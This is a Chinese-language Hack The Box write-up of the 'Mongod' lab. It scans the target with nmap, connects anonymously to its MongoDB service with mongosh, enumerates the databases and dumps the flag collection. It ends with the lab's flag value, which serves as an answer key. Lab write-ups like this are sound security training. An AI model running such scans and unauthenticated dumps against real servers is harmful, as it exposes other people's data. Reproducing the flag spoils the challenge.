HTB_Mongod练习记录——mongoDB 27017
目标ip: 10.129.12.113
一、介绍
MongoDB 是一个面向文档的 NoSQL 数据库,其数据存储组织形式如下:
数据库是 MongoDB 实例中数据组织的顶层。数据库被组织成包含文档的集合。文档包含类似 JSON 格式的文字数据,例如字符串、数字、日期等。
数据库服务器经常配置错误,允许匿名登录。
二、信息搜集
测试连接: ping 10.129.12.113
扫描端口: sudo nmap -p- --min-rate=1000 -sV 10.129.12.113
-p- :此标志扫描所有 TCP 端口,范围从 0-65535
-sV :尝试确定端口上运行的服务的版本
--min-rate :用于指定 Nmap 每秒应发送的最小数据包数;数字越大,扫描速度越快
被屏蔽了,不知道为什么,贴个官图:
安装 MongoDB shell 实用程序:
curl -O https://downloads.mongodb.com/compass/mongosh-2.3.2-linux-x64.tgz
tar xvf mongosh-2.3.2-linux-x64.tgz
cd mongosh-2.3.2-linux-x64/bin
尝试以匿名用户身份连接到远程主机上运行的 MongoDB 服务器:
./mongosh mongodb://10.129.12.113:27017
连接成功。
show dbs
use sensitive_information
show collections
使用 db.collection.find() 命令转储 flag 集合中存在的文档内容:
db.flag.find();
flag: 1b6e6fb359e7c40241b6d431427ba6ea
浙公网安备 33010602011771号